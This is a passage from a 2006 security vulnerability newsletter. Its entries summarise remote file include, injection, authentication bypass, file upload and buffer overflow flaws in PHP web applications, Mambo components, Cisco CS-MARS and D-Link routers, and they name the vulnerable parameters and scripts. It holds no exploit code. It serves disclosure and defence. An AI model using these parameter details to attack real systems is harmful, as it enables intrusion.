• Description: SubberZ[Lite] is a site subscription management application. Insufficient sanitization of the "myadmindir" variable of the "user-func.php" script exposes the application to a remote file include issue. All current versions are affected.
• Ref: http://www.securityfocus.com/archive/1/440139

• 06.29.62 - CVE: Not Available
• Platform: Web Application
• Title: Sitemap.XML.PHP Remote File Include
• Description: Sitemap is a Mambo component. The module is exposed to a remote file include issue due to insufficient sanitization of user-supplied input to the "mosConfig_absolute_path" variable of the "components/com_sitemap/sitemap.xml.php" script. Sitemap version 2.0 is affected.
• Ref: http://advisories.echo.or.id/adv/adv38-matdhule-2006.txt

• 06.29.63 - CVE: Not Available
• Platform: Web Application
• Title: MiniBB Multiple Remote File Include Vulnerabilities
• Description: MiniBB is a web forum application. It is affected by a file include issue due to insufficient sanitization of the "absolute_path" parameter of the "com_minibb.php" and "index.php" scripts. All current versions are affected.
• Ref: http://www.securityfocus.com/bid/18998

• 06.29.64 - CVE: CVE-2006-2484
• Platform: Web Application
• Title: IceWarp Web Mail Multiple File Include Vulnerabilities
• Description: IceWarp Web Mail is a mail client for the Marek Mail Server. It is vulnerable to multiple remote file include issues due to insufficient sanitization of user-supplied input to various parameters and scripts. IceWarp Web Mail version 5.6 is vulnerable.
• Ref: http://secunia.com/secunia_research/2005-62/advisory/

• 06.29.65 - CVE: Not Available
• Platform: Web Application
• Title: ListMessenger LM_Path Parameter Remote File Include
• Description: ListMessenger is a web-based mailing list management application. Insufficinet sanitization of the "lm_path" parameter of the "listmessenger.php" script exposes the application to a remote file include issue. ListMessenger version 0.9.3 is affected.
• Ref: http://www.securityfocus.com/archive/1/440291

• 06.29.66 - CVE: Not Available
• Platform: Web Application
• Title: FlushCMS Class.Rich.PHP Remote File Include
• Description: FlushCMS is a content management system. Insufficient sanitization of user-supplied input exposes the application to a remote file include issue. FlushCMS version 1.0.0-pre2 is affected.
• Ref: http://www.securityfocus.com/bid/19023

• 06.29.67 - CVE: Not Available
• Platform: Web Application
• Title: HTMLArea3 Addon For Mambo Config.Inc.PHP Remote File Include
• Description: HTMLArea3 is a module for Mambo. It is affected by a file include issue due to insufficient sanitization of the "mosConfig_absolute_path" parameter in the "config.inc.php" script. HTMLArea3 versions 0.3en and earlier are affected.
• Ref: http://www.securityfocus.com/bid/19047

• 06.29.68 - CVE: CVE-2006-3736
• Platform: Web Application
• Title: VideoDB Component Module For Mambo Xml_Domit_Lite_Include.PHP Remote File Include
• Description: VideoDB Component is a module for Mambo. Mambo is a content management system. The module is exposed to a remote file include issue due to insufficient sanitization of user-supplied input to the "mosConfig_absolute_path" parameter of the "xml_domit_lite_include.php" script. Mambo versions 0.3en and earlier are affected.
• Ref: http://www.securityfocus.com/bid/19049

• 06.29.69 - CVE: Not Available
• Platform: Web Application
• Title: PHP-Post Logincookie Remote Authentication Bypass
• Description: PHP-Post is a forum management application. It is vulnerable to an authentication bypass issue because of a flaw in the application's "Auto Login" feature. PHP-Post versions 0.21 and 1.0 are vulnerable.
• Ref: http://www.securityfocus.com/archive/1/440419

• 06.29.70 - CVE: CVE-2006-3303, CVE-2006-3304
• Platform: Web Application
• Title: DeluxeBB Multiple Input Validation Vulnerabilities
• Description: DeluxeBB a web-based message board implemented in PHP. It is prone to multiple input-validation vulnerabilities. The issues include a cross-site scripting vulnerability in the "sub" parameter of the "misc.php" script as well as multiple SQL injection vulnerabilities in unspecified parameters and scripts. Version 1.07 is vulnerable.
• Ref: http://www.securityfocus.com/archive/1/440435

• 06.29.71 - CVE: Not Available
• Platform: Web Application
• Title: hdweGUEST Multiple HTML Injection Vulnerabilities
• Description: hdweGUEST is an online Guest book. It is prone to multiple HTML injection vulnerabilities due to improper sanitization of user-supplied input to the "username" and the "usernachricht" input boxes in the "new_entry.php" script. hdweGUEST versions 2.1.1 and prior are vulnerable.
• Ref: http://www.securityfocus.com/bid/19053

• 06.29.72 - CVE: Not Available
• Platform: Web Application
• Title: ToendaCMS Connector.PHP Arbitrary File Upload
• Description: ToendaCMS is a content management application. It is vulnerable to an arbitrary file upload issue due to insufficient sanitization of user-supplied input to the "CurrentFolder" parameter of the "connector.php" script. ToendaCMS versions 1.0 and earlier are vulnerable.
• Ref: http://www.milw0rm.com/exploits/2035

• 06.29.73 - CVE: Not Available
• Platform: Web Application
• Title: AFCommerce Shopping Cart Multiple Input Validation Vulnerabilities
• Description: AFCommerce Shopping Cart is a web-based shopping cart application implemented in PHP. It is prone to multiple input validation vulnerabilities. Reports indicate that the "Demo Store" version is affected by these vulnerabilities.
• Ref: http://www.securityfocus.com/bid/19074

• 06.29.74 - CVE: Not Available
• Platform: Web Application
• Title: IDevSpot PHPLinkExchange Index.PHP Remote File Include
• Description: PHPLinkExchange is a link exchange directory application. Insufficient sanitization of the "page" variable in the "index.php" script exposes the application to a remote file include issue.
• Ref: http://www.securityfocus.com/bid/19083

• 06.29.75 - CVE: Not Available
• Platform: Web Application
• Title: IDevSpot PHPHostBot Index.PHP Remote File Include
• Description: PHPHostBot is a web hosting account creation and billing automation application. It is exposed to a remote file include issue because it fails to properly sanitize user-supplied input to the "page" variable of "order/index.php". PHPHostBot version 1.0 is vulnerable. Ref: http://pridels.blogspot.com/2006/07/phphostbot-remote-file-inclusion-vuln.html

• 06.29.76 - CVE: Not Available
• Platform: Web Application
• Title: Chipmunk Guestbook AddEntry.PHP HTML Injection
• Description: Chipmunk Guestbook is prone to an HTML injection issue due to insufficient sanitization of the "homepage" variable of the "addentry.php" script. Chipmunk Guestbook version 1.4 is affected.
• Ref: http://www.securityfocus.com/bid/19087

• 06.29.77 - CVE: Not Available
• Platform: Web Application
• Title: IManage Absolute_Path Multiple File Include Vulnerabilities
• Description: iManage is a web-based content management system implemented in PHP. It is prone to multiple remote file-include vulnerabilities due to a failure in the application to properly sanitize user-supplied input to the "absolute_path" parameter of multiple scripts. iManage CMS version 4.0.12 is reported as vulnerable.
• Ref: http://www.securityfocus.com/bid/19090/

• 06.29.78 - CVE: Not Available
• Platform: Web Application
• Title: SiteDepth CMS Constants.PHP Remote File Include
• Description: SiteDepth CMS is a content management system. It is exposed to a remote file include issue due to insufficient sanitization of user-supplied input in the "SD_DIR" parameter of the "constant.php" script. SiteDepth CMS versions 3.01 and prior are vulnerable to this issue.
• Ref: http://www.securityfocus.com/bid/19094

• 06.29.79 - CVE: CVE-2006-3561
• Platform: Network Device
• Title: BT Voyager Multiple Remote Authentication Bypass Vulnerabilities
• Description: BT Voyager is a wireless internet connectivity device. It is exposed to multiple authentication bypass issues because of a flaw in the application's authentication process. BT Voyager 2091 Wireless ADSL, Firmware version 2.21.05.08m_A2pB018c1.d16d, and Firmware version 3.01m are affected.
• Ref: http://www.securityfocus.com/archive/1/440405

• 06.29.80 - CVE: Not Available
• Platform: Network Device
• Title: Cisco Security Monitoring Analysis and Response System Information Disclosure
• Description: Cisco Security Monitoring, Analysis and Response System (CS-MARS) is a security system that correlates and analyzes data in event logs received from various network devices. It is prone to an information disclosure vulnerability because the Oracle database that ships with CS-MARS contains several default Oracle accounts with well-known passwords. Versions 4.1.5 and prior are reported as vulnerable.
• Ref: http://www.cisco.com/warp/public/707/cisco-sa-20060719-mars.shtml

• 06.29.81 - CVE: CVE-2006-3734
• Platform: Network Device
• Title: Cisco Security Monitoring Analysis and Response System Multiple Privilege Escalation Vulnerabilities
• Description: Cisco Security Monitoring, Analysis and Response System (CS-MARS) is a security system that correlates and analyzes data in event logs received from various network devices. CS-MARS is exposed to multiple privilege escalation vulnerabilities. Please refer to the link below for further details. Cisco Security Monitoring versions prior to 4.2.1 are vulnerable.
• Ref: http://www.cisco.com/warp/public/707/cisco-sa-20060719-mars.shtml

• 06.29.82 - CVE: CVE-2006-3687
• Platform: Hardware
• Title: Multiple D-Link Routers UPNP Buffer Overflow
• Description: D-Link wired and wireless routers are prone to a buffer overflow vulnerability. The vulnerability exists in the UPnP M-SEARCH function when processing overly large requests (approximately 800 bytes) from the Local Area Network (LAN) interface. Since UPnP is HTTP-based, an attacker may use the URI portion of the request header to include malicious exploit code.
• Ref: http://www.securityfocus.com/archive/1/440298

(c) 2006. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.